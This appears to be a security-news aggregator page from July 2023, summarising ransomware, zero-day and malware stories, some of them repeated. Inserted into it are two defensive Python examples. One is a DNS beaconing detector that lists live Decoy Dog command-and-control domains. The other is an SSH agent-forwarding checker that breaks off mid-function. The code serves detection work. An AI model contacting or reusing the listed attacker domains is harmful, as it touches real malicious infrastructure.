                2023-07-26 https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-bug-that-broke-video-recording-in-windows-apps/
                Microsoft has fixed a known issue causing video recording and playing failures in some apps on Windows 10 and Windows 11 systems. [...]

                Autosummary: WVC1 has been developed to enhance the conventional video codec design, which relies on discrete cosine transform (DCT), a technique shared by other codecs such as H.261, H.263, MPEG-1, MPEG-2, and MPEG-4.


                ALPHV ransomware adds data leak API in new extortion strategy

                exploits ransomware
                2023-07-26 https://www.bleepingcomputer.com/news/security/alphv-ransomware-adds-data-leak-api-in-new-extortion-strategy/
                The ALPHV ransomware gang, also referred to as BlackCat, is trying to put more pressure on their victims to pay a ransom by providing an API for their leak site to increase visibility for their attacks. [...]

                Autosummary: The group also provided a crawler written in Python to help retrieve the latest information on the data leak site.


                New Nitrogen malware pushed via Google Ads for ransomware attacks

                exploits ransomware
                2023-07-26 https://www.bleepingcomputer.com/news/security/new-nitrogen-malware-pushed-via-google-ads-for-ransomware-attacks/
                A new "Nitrogen" initial access malware campaign uses Google and Bing search ads to promote fake software sites that infect unsuspecting users with Cobalt Strike and ransomware payloads. [...]

                Autosummary: Today, Sophos released a report on the Nitrogen campaign, detailing how it primarily targets technology and non-profit organizations in North America, impersonating popular software like AnyDesk, Cisco AnyConnect VPN, TreeSize Free, and WinSCP.


                New Realst Mac malware, disguised as blockchain games, steals cryptocurrency wallets

                exploits
                2023-07-26 https://grahamcluley.com/new-realst-mac-malware-disguised-as-blockchain-games-steals-cryptocurrency-wallets/
                Fake blockchain games that are being actively promoted by cybercriminals on social media are actually designed to infect the computers of unsuspecting Mac users with cryptocurrency-stealing malware.



                SeeMetrics Security Performance Boards empowers CISOs to validate security programs

                industry
                2023-07-26 https://www.helpnetsecurity.com/2023/07/26/seemetrics-security-performance-boards/

                SeeMetrics launched its new Security Performance Boards. Organized by security domains, the new Security Performance Boards are a collection of out-of-the box metrics that empower security leaders to measure the performance of their technologies, processes, and people in real time. SeeMetrics is the first ever data platform that drives cybersecurity performance assessment directly from the operational stack and “inside the perimeter”. With SeeMetrics’ Security Performance Boards, cybersecurity executives and operational teams gain a centralized and …



                Autosummary: With SeeMetrics’ Security Performance Boards, cybersecurity executives and operational teams gain a centralized and business-aligned view of measurements, metrics, and Key Performance Indicators (KPIs), which shows trends, risks, and historical context.


                MikroTik vulnerability could be used to hijack 900,000 routers (CVE-2023-30799)

                exploits
                2023-07-26 https://www.helpnetsecurity.com/2023/07/26/cve-2023-30799/

                A privilege escalation vulnerability (CVE-2023-30799) could allow attackers to commandeer up to 900,000 MikroTik routers, says VulnCheck researcher Jacob Baines. While exploiting it does require authentication, acquiring credentials to access the routers is not that difficult. “RouterOS [the underlying operating system] ships with a fully functional ‘admin’ user. Hardening guidance tells administrators to delete the ‘admin’ user, but we know a large number of installations haven’t,” Baines explained. “We probed a sample of hosts on …



                Autosummary: The interesting thing about CVE-2023-30799 is not that it is a bug that allows elevation of privilege, but that it allows attackers to achieve “super-admin” privileges, which gives them full access to the device’s OS and, potentially, lets them make undetectable changes to it.


                Decoy Dog: New Breed of Malware Posing Serious Threats to Enterprise Networks

                exploits
                2023-07-26 https://thehackernews.com/2023/07/decoy-dog-new-breed-of-malware-posing.html
                A deeper analysis of a recently discovered malware called Decoy Dog has revealed that it's a significant upgrade over the Pupy RAT, an open-source remote access trojan it's modeled on. "Decoy Dog has a full suite of powerful, previously unknown capabilities – including the ability to move victims to another controller, allowing them to maintain communication with compromised machines and remain

                Autosummary: "Decoy Dog has a full suite of powerful, previously unknown capabilities – including the ability to move victims to another controller, allowing them to maintain communication with compromised machines and remain hidden for long periods of time," Infoblox said in a Tuesday report.


                SEC now requires companies to disclose cyberattacks in 4 days

                ciber
                2023-07-26 https://www.bleepingcomputer.com/news/security/sec-now-requires-companies-to-disclose-cyberattacks-in-4-days/
                The U.S. Securities and Exchange Commission has adopted new rules requiring publicly traded companies to disclose cyberattacks within four business days after determining they're material incidents. [...]

                Autosummary: "I think companies and investors alike, however, would benefit if this disclosure were made in a more consistent, comparable, and decision-useful way."


                Windows 11 KB5028254 update fixes VPN performance issues, 27 bugs

                exploits
                2023-07-26 https://www.bleepingcomputer.com/news/microsoft/windows-11-kb5028254-update-fixes-vpn-performance-issues-27-bugs/
                Microsoft has released the July 2023 optional cumulative update for Windows 11, version 22H2, with fixes for 27 issues, including ones affecting VPN performance and display or audio devices. [...]

                Autosummary: Other highlights in Windows 11 KB5028254: Today's preview release comes with additional fixes and improvements, with some of the most significant ones outlined below: This update addresses an issue in the Windows Notification Platform.


                SEC adopts new cybersecurity incident disclosure rules for companies

                ciber
                2023-07-26 https://www.helpnetsecurity.com/2023/07/26/sec-cybersecurity-incident-disclosure-rules/

                The Securities and Exchange Commission (SEC) today adopted rules requiring registrants to disclose material cybersecurity incidents they experience and to disclose on an annual basis material information regarding their cybersecurity risk management, strategy, and governance. The Commission also adopted rules requiring foreign private issuers to make comparable disclosures. “Whether a company loses a factory in a fire — or millions of files in a cybersecurity incident — it may be material to investors,” said SEC …



                Autosummary: The new rules also add Regulation S-K Item 106, which will require registrants to describe their processes, if any, for assessing, identifying, and managing material risks from cybersecurity threats, as well as the material effects or reasonably likely material effects of risks from cybersecurity threats and previous cybersecurity incidents.


                Microsoft previews Defender for IoT firmware analysis service

                industry
                2023-07-26 https://www.bleepingcomputer.com/news/microsoft/microsoft-previews-defender-for-iot-firmware-analysis-service/
                Microsoft announced the public preview of a new Defender for IoT feature that helps analyze the firmware of embedded Linux devices like routers for security vulnerabilities and common weaknesses. [...]



                Following claims by two ransomware groups, Yamaha confirms cyberattack

                exploits ransomware ciber
                2023-07-26 https://www.bitdefender.com/blog/hotforsecurity/following-claims-by-two-ransomware-groups-yamaha-confirms-cyberattack/
                Yamaha Corporation, the world's largest producer of musical equipment, has confirmed that it has suffered a "cybersecurity incident" during which hackers gained unauthorised access to its systems, and stole data. Read more in my article on the Hot for Security blog.



                Ransomware groups claim responsibility for double-attack on Yamaha

                exploits
                2023-07-26 https://www.malwarebytes.com/blog/news/2023/07/ransomware-groups-claim-responsibility-for-double-attack-on-yamaha

                We take a look at claims that Yamaha has been compromised by two unrelated ransomware groups.

                Autosummary: Once you've isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. From our post: Akira is a fresh ransomware hitting enterprises globally since March 2023, having already published in April the data of nine companies across different sectors like education, finance, and manufacturing. When executed, the ransomware deletes Windows Shadow Volume Copies, encrypts files with specific extensions, and appends the .akira extension to the encrypted files.


                Microsoft fixes bug that breaks video recording in Windows apps

                exploits
                2023-07-26 https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-bug-that-breaks-video-recording-in-windows-apps/
                Microsoft has fixed a known issue causing video recording and playing failures in some apps on Windows 10 and Windows 11 systems. [...]

                Autosummary: WVC1 has been developed to enhance the conventional video codec design, which relies on discrete cosine transform (DCT), a technique shared by other codecs such as H.261, H.263, MPEG-1, MPEG-2, and MPEG-4.


                RaaS proliferation: 14 new ransomware groups target organizations worldwide

                exploits ransomware
                2023-07-25 https://www.helpnetsecurity.com/2023/07/25/active-ransomware-groups-2023/

                In Q2 2023, GuidePoint Research and Intelligence Team (GRIT) tracked 1,177 total publicly posted ransomware victims claimed by 41 different threat groups. The most impacted industries: GRIT’s report shows a 38% increase in public ransomware victims compared to Q1 2023, and a startling 100% increase from Q2 2022. Manufacturing and technology, representing 14% and 11% of impacted industries respectively, continue to be the most impacted industries, a trend that has persisted from GRIT’s observations …



                Autosummary: “Reduced barriers to entry afforded by the Crimeware-as-a-Service and Ransomware-as-a-Service economies will almost certainly encourage more entrants going forward, and though the re-use of historical malware and ransomware provides an advantage for well-prepared and resourced defenders, smaller or less-resourced organizations will face an increased risk from the greater volume of threats,” Schmitt continued.


                Norway says Ivanti zero-day was used to hack govt IT systems

                exploits
                2023-07-25 https://www.bleepingcomputer.com/news/security/norway-says-ivanti-zero-day-was-used-to-hack-govt-it-systems/
                The Norwegian National Security Authority (NSM) has confirmed that attackers used a zero-day vulnerability in Ivanti's Endpoint Manager Mobile (EPMM) solution to breach a software platform used by 12 ministries in the country. [...]

                Autosummary: "An attacker with access to these API paths can access personally identifiable information (PII) such as names, phone numbers, and other mobile device details for users on a vulnerable system," the U.S. Cybersecurity and Infrastructure Security Agency (CISA) warned in an advisory published on Monday.


                Inspiring secure coding: Strategies to encourage developers’ continuous improvement

                ransomware
                2023-07-25 https://www.helpnetsecurity.com/2023/07/25/pieter-danhieux-secure-code-warrior-secure-coding-training/

                In software development, the importance of secure coding practices cannot be overstated. Fostering a security culture within development teams has become crucial to ensure the integrity and protection of digital systems. To delve deeper into this topic, we had the opportunity to interview Pieter Danhieux, CEO at Secure Code Warrior. He sheds light on the significance of positive security culture, the reasons behind recurrent vulnerabilities, strategies for incorporating secure coding training without hampering development processes, …



                Autosummary: He sheds light on the significance of positive security culture, the reasons behind recurrent vulnerabilities, strategies for incorporating secure coding training without hampering development processes, the effectiveness of gamified learning experiences, the need for the regular refreshment of secure development training, and innovative methods to encourage developers to improve their secure coding techniques. Resentment can be strong between both teams, but fostering a positive security culture where developers understand the role they can play in driving down code-level vulnerabilities, as well as creating an environment where they can learn secure coding in a way that is comfortable for them, is paramount in repairing that relationship. We now write code for different purposes: full-stack, embedded, mobile, APIs… and security vulnerabilities exist in most of those technologies in different forms, requiring diverse coding patterns and approaches.


                Ivanti Releases Urgent Patch for EPMM Zero-Day Vulnerability Under Active Exploitation

                exploits
                2023-07-25 https://thehackernews.com/2023/07/ivanti-releases-urgent-patch-for-epmm.html
                Ivanti is warning users to update their Endpoint Manager Mobile (EPMM) mobile device management software (formerly MobileIron Core) to the latest version that fixes an actively exploited zero-day vulnerability. Dubbed CVE-2023-35078, the issue has been described as a remote unauthenticated API access vulnerability that impacts currently supported version 11.4 releases 11.10, 11.9, and 11.8 as



                Apple Rolls Out Urgent Patches for Zero-Day Flaws Impacting iPhones, iPads and Macs

                exploits
                2023-07-25 https://thehackernews.com/2023/07/apple-rolls-out-urgent-patches-for-zero.html
                Apple has rolled out security updates to iOS, iPadOS, macOS, tvOS, watchOS, and Safari to address several security vulnerabilities, including one actively exploited zero-day bug in the wild. Tracked as CVE-2023-38606, the shortcoming resides in the kernel and potentially permits a malicious app to modify sensitive kernel state. The company said it was addressed with improved state management.



                Ivanti zero-day exploited to target Norwegian government (CVE-2023-35078)

                exploits government
                2023-07-25 https://www.helpnetsecurity.com/2023/07/25/cve-2023-35078/

                A zero-day vulnerability (CVE-2023-35078) affecting Ivanti Endpoint Manager Mobile (EPMM) has been exploited to carry out an attack that affected 12 Norwegian ministries, the Norwegian National Security Authority (NSM) confirmed on Tuesday. What is known about the attacks? On Monday, the Norwegian government said that the attack was detected on the ICT platform used by the 12 ministries, though it did not name the platform at the time. The ICT platform – now confirmed …



                Autosummary: “An attacker with access to these API paths can access personally identifiable information (PII) such as names, phone numbers, and other mobile device details for users on a vulnerable system.”


                Apple fixes exploited zero-day in all of its OSes (CVE-2023-38606)

                exploits
                2023-07-25 https://www.helpnetsecurity.com/2023/07/25/cve-2023-38606/

                Apple has patched an exploited zero-day kernel vulnerability (CVE-2023-38606) in iOS, iPadOS, macOS, watchOS and tvOS. The CVE-2023-38606 fix has been backported. In early July, Apple fixed an actively exploited zero-day vulnerability (CVE-2023-37450) in WebKit. The vulnerability has been patched via a Rapid Security Response update in iOS 16.5.1 and iPadOS 16.5.1, macOS Ventura 13.4.1, and in Safari (16.5.2) via a regular update, thus also delivering the fix to users of older macOS versions (macOS Big …





                More US States are ramping up data privacy laws in 2023

                government
                2023-07-25 https://www.bleepingcomputer.com/news/security/more-us-states-are-ramping-up-data-privacy-laws-in-2023/
                Legislation moves slowly, but in 2023 almost all five of the below regulations will take effect, making it a huge year for state data privacy acts. Learn more from Specops Software about the US privacy laws and what it means for your organization. [...]

                Autosummary: 2023: The year of data privacy laws. Legislation moves slowly, but in 2023 almost all five of the below regulations will take effect, making it a huge year for state data privacy acts. Password security protects your business and customers: Compromised passwords can lead to potential infrastructure vulnerabilities and the loss of customer data, which may violate different state data protection regulations. Connecticut (CTDPA): Businesses processing data of at least 25,000 consumers and services at least 50% of gross revenues from selling data or 100,000 consumers, excluding purely patent transactions.


                Over 400,000 corporate credentials stolen by info-stealing malware

                exploits
                2023-07-25 https://www.bleepingcomputer.com/news/security/over-400-000-corporate-credentials-stolen-by-info-stealing-malware/
                The analysis of nearly 20 million information-stealing malware logs sold on the dark web and Telegram channels revealed that they had achieved significant infiltration into business environments. [...]

                Autosummary: More specifically, Flare found the following in the examined stealer logs: 179,000 AWS Console credentials, 2,300 Google Cloud credentials, 64,500 DocuSign credentials, 15,500 QuickBooks credentials, 23,000 Salesforce credentials, and 66,000 CRM credentials. In addition to the above, there are about 48,000 logs that include access to "okta.com," an enterprise-grade identity management service used by organizations for cloud and on-premise user authentication.


                Panorays unveils cybersecurity enhancements for supply chains

                ciber
                2023-07-25 https://www.helpnetsecurity.com/2023/07/25/panorays-supply-chain-discovery/

                Panorays announced two capabilities – Supply Chain Discovery and Risk Insights and Response Portal. These new additions empower organizations to gain comprehensive visibility into their digital supply chains and effectively manage potential cybersecurity risks posed by third, fourth, and Nth party vendors. To address the growing risks of digital supply chains, originating from vendors beyond immediate third parties, Panorays is releasing its Supply Chain Discovery solution. This tool automates the identification of a company’s digital …





                North Korean Nation-State Actors Exposed in JumpCloud Hack After OPSEC Blunder

                government
                2023-07-25 https://thehackernews.com/2023/07/north-korean-nation-state-actors.html
                North Korean nation-state actors affiliated with the Reconnaissance General Bureau (RGB) have been attributed to the JumpCloud hack following an operational security (OPSEC) blunder that exposed their actual IP address. Google-owned threat intelligence firm Mandiant attributed the activity to a threat actor it tracks under the name UNC4899, which likely shares overlaps with clusters already

                Autosummary: The script, for its part, is engineered to download and execute a second-stage payload named FULLHOUSE.DOORED, using it as a conduit to deploy additional malware such as STRATOFEAR and TIEDYE, after which the prior payloads were removed from the system in an attempt to cover up the tracks.
                FULLHOUSE.DOORED - A C/C++-based first-stage backdoor that communicates using HTTP and comes with support for shell command execution, file transfer, file management, and process injection
                STRATOFEAR - A second-stage modular implant that's chiefly designed to gather system information as well as retrieve and execute more modules from a remote server or loaded from disk
                TIEDYE - A second-stage Mach-O executable that can communicate with a remote server to run additional payloads, harvest basic system information, and execute shell commands
                TIEDYE is also said to exhibit similarities to RABBITHUNT, a backdoor written in C++ that communicates via a custom binary protocol over TCP and which is capable of reverse shell, file transfer, process creation, and process termination. "The identified packages, published in pairs, required installation in a specific sequence, subsequently retrieving a token that facilitated the download of a final malicious payload from a remote server," Phylum said in a new analysis detailing the discovery of new npm modules used in the same campaign.


                Casbaneiro Banking Malware Goes Under the Radar with UAC Bypass Technique

                financial exploits
                2023-07-25 https://thehackernews.com/2023/07/casbaneiro-banking-malware-goes-under.html
                The financially motivated threat actors behind the Casbaneiro banking malware family have been observed making use of a User Account Control (UAC) bypass technique to gain full administrative privileges on a machine, a sign that the threat actor is evolving their tactics to avoid detection and execute malicious code on compromised assets. "They are still heavily focused on Latin American

                Autosummary: Infection chains typically begin with a phishing email pointing to a booby-trapped attachment that, when launched, activates a series of steps that culminate in the deployment of the banking malware, alongside scripts that leverage living-off-the-land (LotL) techniques to fingerprint the host and gather system metadata.


                How MDR Helps Solve the Cybersecurity Talent Gap

                ciber
                2023-07-25 https://thehackernews.com/2023/07/how-mdr-helps-solve-cybersecurity.html
                How do you overcome today's talent gap in cybersecurity? This is a crucial issue, particularly when you find executive leadership or the board asking pointed questions about your security team's ability to defend the organization against new and current threats. This is why many security leaders find themselves turning to managed security services like MDR (managed detection and response),

                Autosummary: BlackBerry MDR: The defining characteristics of the BlackBerry® MDR service, CylanceGUARD®, are best expressed in terms of its people, process, and technology. He manages people, strategy, roadmaps, and go-to-market for P&L business, delivering new technologies and user experiences across enterprise and consumer products. Additionally, he built and developed product management, marketing, and business operations teams, overseeing 3 to 15 direct staff and indirectly influencing 30 to 400+ R&D staff.


                Realst info-stealing malware targets macOS cryptocurrency users

                exploits
                2023-07-25 https://www.bleepingcomputer.com/news/security/realst-info-stealing-malware-targets-macos-cryptocurrency-users/
                A new Mac malware named "Realst" is being used in a massive campaign targeting Apple computers, with some of its latest variants including support for macOS 14 Sonoma, which is still in development. [...]

                Autosummary: The malware, first discovered by security researcher iamdeadlyz, is distributed to both Windows and macOS users in the form of fake blockchain games using names such as Brawl Earth, WildWorld, Dawnland, Destruction, Evolion, Pearl, Olymp of Reptiles, and SaintLegend.


                Microsoft shares temp fix for Outlook Desktop slow saving bug

                exploits
                2023-07-25 https://www.bleepingcomputer.com/news/microsoft/microsoft-shares-temp-fix-for-outlook-desktop-slow-saving-bug/
                Microsoft is investigating a known issue causing Microsoft 365 customers to experience significant delays when saving attachments in Outlook Desktop to a network share. [...]

                Autosummary: Outlook "trying to connect" dialog box (Microsoft)
                While the Outlook, Office, and Windows teams are still investigating the issue and working on a fix, Redmond provided a temporary solution for impacted users.


                Mysterious Decoy Dog malware toolkit still lurks in DNS shadows

                exploits
                2023-07-25 https://www.bleepingcomputer.com/news/security/mysterious-decoy-dog-malware-toolkit-still-lurks-in-dns-shadows/
                New details have emerged about Decoy Dog, a largely undetected sophisticated toolkit likely used for at least a year in cyber intelligence operations, relying on the domain name system (DNS) for command and control activity. [...]

                Autosummary: Decoy Dog was discovered in early April after Infoblox specialists found anomalous DNS beaconing activity from half a dozen domains that acted as command and control (C2) servers for the malware:
                cbox4[.]ignorelist[.]com
                claudfront[.]net
                hsdps[.]cc
                ads-tm-glb[.]click
                atlas-upd[.]com
                allowlisted[.]net
                At the time, the researchers said that they “found the identical DNS query patterns arising from enterprise networks, which could not be tied to consumer devices” and “confirmed that the queries originated from network appliances in a very limited number of customer networks.”
                Several Decoy Dog controllers (source: Infoblox)
                Highly targeted malware with a short list of victims: based on passive DNS traffic analysis, it is difficult to determine an accurate number of Decoy Dog clients, which would indicate impacted devices, but the largest number of active concurrent connections that Infoblox observed on any one controller was less than 50 and the smallest was four. However, additional research is required to determine the targets, the initial compromise method (e.g. supply chain, known vulnerability, zero-day in targeted devices), and how actors move into the network.
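The signal Infoblox describes (the same query pattern repeating from a few network appliances to a handful of controller domains) is something a blue team can look for in its own resolver logs. The following is an added example, not Infoblox's tooling or anything from the article: it reads constructed resolver log lines in an assumed `<unix_ts> <client_ip> <qname>` format, flags queries that fall under the six controller domains listed above, and separately flags any client/name pair whose inter-query gaps are nearly constant, which catches the same behaviour for a controller that is not yet on any list. The thresholds `min_queries` and `max_cv` are illustrative choices, not values from the research.

```python
"""Spot DNS beaconing and known Decoy Dog controller domains in resolver logs.

Added example, not Infoblox's tooling. Log format is an assumption:
    <unix_ts> <client_ip> <qname>
"""
from collections import defaultdict
from statistics import mean, pstdev

# Controller domains from the Infoblox findings summarised in the article.
DECOY_DOG_C2 = {
    "cbox4.ignorelist.com", "claudfront.net", "hsdps.cc",
    "ads-tm-glb.click", "atlas-upd.com", "allowlisted.net",
}

# Constructed log lines for the example (not real traffic). 10.0.0.5 polls a
# listed controller every 600 s; 10.0.0.9 polls an unlisted name every 300 s;
# 10.0.0.7 is ordinary irregular browsing; the last line is malformed.
SAMPLE_LOG = """\
1000 10.0.0.5 upd.atlas-upd.com
1600 10.0.0.5 upd.atlas-upd.com
2200 10.0.0.5 upd.atlas-upd.com
2800 10.0.0.5 upd.atlas-upd.com
3400 10.0.0.5 upd.atlas-upd.com
100 10.0.0.9 beacon.evil-example.net
400 10.0.0.9 beacon.evil-example.net
700 10.0.0.9 beacon.evil-example.net
1000 10.0.0.9 beacon.evil-example.net
1000 10.0.0.7 www.example.com
1010 10.0.0.7 www.example.com
1500 10.0.0.7 www.example.com
1503 10.0.0.7 www.example.com
2600 10.0.0.7 www.example.com
garbage line
"""


def match_listed_domain(qname, domains):
    """Return the listed domain that qname equals or sits under, else None."""
    q = qname.rstrip(".").lower()
    for d in domains:
        if q == d or q.endswith("." + d):
            return d
    return None


def parse_log(text):
    """Yield (ts, client, qname) tuples; malformed lines are skipped."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue
        try:
            yield float(parts[0]), parts[1], parts[2].rstrip(".").lower()
        except ValueError:
            continue


def gap_stats(timestamps):
    """Mean inter-query gap and its coefficient of variation (0 = perfectly regular)."""
    ts = sorted(timestamps)
    gaps = [b - a for a, b in zip(ts, ts[1:])]
    if len(gaps) < 3:
        return None
    m = mean(gaps)
    if m <= 0:
        return None
    return m, pstdev(gaps) / m


def analyse(text, min_queries=4, max_cv=0.15):
    """Return (listed_hits, beacon_candidates), both sorted.

    listed_hits: (client, qname, matched_domain) for names under a known controller.
    beacon_candidates: (client, qname, mean_gap, cv) for pairs queried at a
    near-constant interval, whether or not the name is on the list.
    """
    by_pair = defaultdict(list)
    hits = set()
    for ts, client, qname in parse_log(text):
        by_pair[(client, qname)].append(ts)
        d = match_listed_domain(qname, DECOY_DOG_C2)
        if d:
            hits.add((client, qname, d))
    beacons = []
    for (client, qname), stamps in by_pair.items():
        if len(stamps) < min_queries:
            continue
        stats = gap_stats(stamps)
        if stats and stats[1] <= max_cv:
            beacons.append((client, qname, stats[0], stats[1]))
    return sorted(hits), sorted(beacons)


if __name__ == "__main__":
    listed, beacons = analyse(SAMPLE_LOG)
    for client, qname, d in listed:
        print(f"KNOWN C2  {client} -> {qname} (under {d})")
    for client, qname, gap, cv in beacons:
        print(f"BEACONING {client} -> {qname} every {gap:.0f}s (cv={cv:.2f})")
```

Two things the regularity check deliberately does not do: it ignores TTL and answer content, and it treats a low coefficient of variation as suspicious without looking at who the name belongs to, so scheduled legitimate traffic (NTP pools, update checkers) will surface and needs an allowlist before this is run against a production resolver.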


                VMware fixes bug exposing CF API admin credentials in audit logs

                exploits
                2023-07-25 https://www.bleepingcomputer.com/news/security/vmware-fixes-bug-exposing-cf-api-admin-credentials-in-audit-logs/
                VMware has patched an information disclosure vulnerability in VMware Tanzu Application Service for VMs (TAS for VMs) and Isolation Segment caused by credentials being logged and exposed via system audit logs. [...]

                Autosummary: TAS for VMs helps enterprises automate the deployment of applications across on-premises or public and private clouds (e.g., vSphere, AWS, Azure, GCP, OpenStack).


                Super Admin elevation bug puts 900,000 MikroTik devices at risk

                exploits
                2023-07-25 https://www.bleepingcomputer.com/news/security/super-admin-elevation-bug-puts-900-000-mikrotik-devices-at-risk/
                A critical severity "Super Admin" privilege elevation flaw puts over 900,000 MikroTik RouterOS routers at risk, potentially enabling attackers to take full control over a device and remain undetected. [...]

                Autosummary: A large-scale problem: The MikroTik CVE-2023-30799 vulnerability was first disclosed without an identifier in June 2022, and MikroTik fixed the issue in October 2022 for RouterOS stable (v6.49.7) and on July 19, 2023, for RouterOS Long-term (v6.49.8).


                CISA warns govt agencies to patch Ivanti bug exploited in attacks

                exploits
                2023-07-25 https://www.bleepingcomputer.com/news/security/cisa-warns-govt-agencies-to-patch-ivanti-bug-exploited-in-attacks/
                The Cybersecurity and Infrastructure Security Agency (CISA) warned U.S. federal agencies today to secure their systems against a maximum severity authentication bypass vulnerability in Ivanti's Endpoint Manager Mobile (EPMM), formerly MobileIron Core. [...]

                Autosummary: MobileIron user portals exposed on the Internet (Shodan)
                Federal agencies ordered to patch by August 15: U.S. Federal Civilian Executive Branch (FCEB) agencies have a three-week deadline, until August 15th, to secure their devices against attacks targeting the CVE-2023-35078 flaw, which was added to CISA's list of Known Exploited Vulnerabilities on Tuesday.


                New Realst macOS malware steals your cryptocurrency wallets

                exploits
                2023-07-25 https://www.bleepingcomputer.com/news/security/new-realst-macos-malware-steals-your-cryptocurrency-wallets/
                A new Mac malware named "Realst" is being used in a massive campaign targeting Apple computers, with some of its latest variants including support for macOS 14 Sonoma, which is still in development. [...]

                Autosummary: The malware, first discovered by security researcher iamdeadlyz, is distributed to both Windows and macOS users in the form of fake blockchain games using names such as Brawl Earth, WildWorld, Dawnland, Destruction, Evolion, Pearl, Olymp of Reptiles, and SaintLegend.


                Tampa General Hospital half thwarts ransomware attack, but still loses patient data

                exploits ransomware
                2023-07-25 https://www.malwarebytes.com/blog/news/2023/07/tampa-general-hospital-half-thwarts-ransomware-attack-but-still-loses-patient-data

                Categories: News, Ransomware
                Tags: Tampa, General Hospital, Snatch, ransomware, RDP, data breach

                The Tampa General Hospital has promised to reach out to the individuals whose information has been stolen by the Snatch ransomware group.

                The post Tampa General Hospital half thwarts ransomware attack, but still loses patient data appeared first on Malwarebytes Labs.


                Autosummary: The information varied from person to person, but may have included names, addresses, phone numbers, dates of birth, Social Security numbers (SSNs), health insurance information, medical record numbers, patient account numbers, dates of service and/or limited treatment information used by TGH for its business operations. Once you've isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts. Snatch's most common attack vectors include brute-force attacks against vulnerable, exposed services such as RDP, VNC (Virtual Network Computing), and TeamViewer.


                Bridging the cybersecurity skills gap through cyber range training

                ciber
                2023-07-24 https://www.helpnetsecurity.com/2023/07/24/debbie-gordon-cyber-range-training/

                In this Help Net Security interview, Debbie Gordon, CEO of Cloud Range explains the concept of a cyber range, its crucial role in preparing for real-world cyber threats, and the importance of realism in cyber training scenarios. Gordon also discusses how cyber ranges facilitate the identification of vulnerabilities and provides advice on maximizing the benefits of cyber range training. Finally, she talks about the resources needed for a robust cyber range environment and the future … More

                The post Bridging the cybersecurity skills gap through cyber range training appeared first on Help Net Security.


                Autosummary: In this Help Net Security interview, Debbie Gordon, CEO of Cloud Range explains the concept of a cyber range, its crucial role in preparing for real-world cyber threats, and the importance of realism in cyber training scenarios. Alternatively, most organizations are opting for a cyber range-as-a-service platform which will take care of all the management and facilitation for you, including range customization, scenario development, and administration. A quality platform can be customized to use different SIEMs, firewalls, EDRs, IDSs, and more, so the team is using the same tools they use every day. Furthermore, scenarios should map to the NICE Framework, adjusting as necessary for each organization, to guarantee that everyone thoroughly understands the knowledge, skills, and abilities (or competencies) required for their role. That's why CISOs, VPs, and security leaders are prioritizing finding individuals with forward-thinking abilities such as problem-solving, leadership, and agility.


                Average cost of a data breach reaches $4.45 million in 2023

                financial
                2023-07-24 https://www.helpnetsecurity.com/2023/07/24/ibm-cost-data-breach-report-2023/

                IBM released its annual Cost of a Data Breach Report, showing the global average cost of a data breach reached $4.45 million in 2023 – an all-time high for the report and a 15% increase over the last 3 years. Detection and escalation costs jumped 42% over this same time frame, representing the highest portion of breach costs and indicating a shift towards more complex breach investigations. According to the report, businesses are divided in … More

                The post Average cost of a data breach reaches $4.45 million in 2023 appeared first on Help Net Security.


                Autosummary: In fact, studied organizations that deployed security AI and automation extensively saw, on average, nearly $1.8 million lower data breach costs than organizations that didn’t deploy these technologies – the biggest cost saver identified in the report. Every second costs: According to the 2023 report, studied organizations that fully deploy security AI and automation saw 108-day shorter breach lifecycles on average compared to organizations not deploying these technologies – and experienced significantly lower incident costs.


                New OpenSSH Vulnerability Exposes Linux Systems to Remote Command Injection

                exploits
                2023-07-24 https://thehackernews.com/2023/07/new-openssh-vulnerability-exposes-linux.html
                Details have emerged about a now-patched flaw in OpenSSH that could be potentially exploited to run arbitrary commands remotely on compromised hosts under specific conditions. "This vulnerability allows a remote attacker to potentially execute arbitrary commands on vulnerable OpenSSH's forwarded ssh-agent," Saeed Abbasi, manager of vulnerability research at Qualys, said in an analysis last week.

                Autosummary: "While browsing through ssh-agent's source code, we noticed that a remote attacker, who has access to the remote server where Alice's ssh-agent is forwarded to, can load (dlopen()) and immediately unload (dlclose()) any shared library in /usr/lib* on Alice's workstation (via her forwarded ssh-agent, if it is compiled with ENABLE_PKCS11, which is the default)," Qualys explained.
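The condition Qualys describes only arises where an agent is forwarded to a server, so the first question for a practitioner is which hosts in a client configuration actually get ForwardAgent. The added example below is not part of the Qualys advisory or of OpenSSH; it evaluates a constructed ssh_config the way ssh does (the first obtained value for a keyword wins, Host patterns are matched with shell-style wildcards) and lists the literal Host entries whose effective ForwardAgent is yes. Match blocks are parsed but never matched, an assumption made to keep the example short; the config text itself is constructed.

```python
"""List Host entries whose effective ForwardAgent is yes.

Added example, not from OpenSSH or Qualys. Evaluation follows ssh_config's
first-obtained-value rule; Match blocks are parsed but not evaluated.
"""
import fnmatch

# Constructed client config for the example.
SAMPLE_CONFIG = """\
# ~/.ssh/config (constructed)
Host bastion
    HostName bastion.example.net
    ForwardAgent yes

Host build-box
    ForwardAgent no

Host ci-runner
    User deploy

Host staging.example.net
    User ops

Host *.example.net
    ForwardAgent=yes

Host *
    ForwardAgent no
"""


def parse_blocks(text):
    """Split a client config into (patterns, settings) blocks.

    Lines before the first Host/Match keyword apply everywhere, so they are
    stored under the pattern '*'. Within a block the first value for a keyword
    wins, as in ssh itself. Keywords are lower-cased; 'Key=value' is accepted.
    """
    blocks = [(["*"], {})]
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        key, _, val = line.replace("=", " ", 1).partition(" ")
        key, val = key.lower(), val.strip()
        if key == "host":
            blocks.append((val.split(), {}))
        elif key == "match":
            blocks.append(([], {}))  # never matched: Match criteria are out of scope here
        else:
            blocks[-1][1].setdefault(key, val)
    return blocks


def effective(blocks, hostname, keyword, default):
    """First block that both matches hostname and sets keyword wins (ssh_config semantics)."""
    for patterns, settings in blocks:
        if keyword in settings and any(fnmatch.fnmatchcase(hostname, p) for p in patterns):
            return settings[keyword]
    return default


def literal_hosts(blocks):
    """Host entries without wildcards or negation, i.e. concrete targets we can evaluate."""
    return sorted({p for pats, _ in blocks for p in pats if not any(c in p for c in "*?!")})


def hosts_with_agent_forwarding(text):
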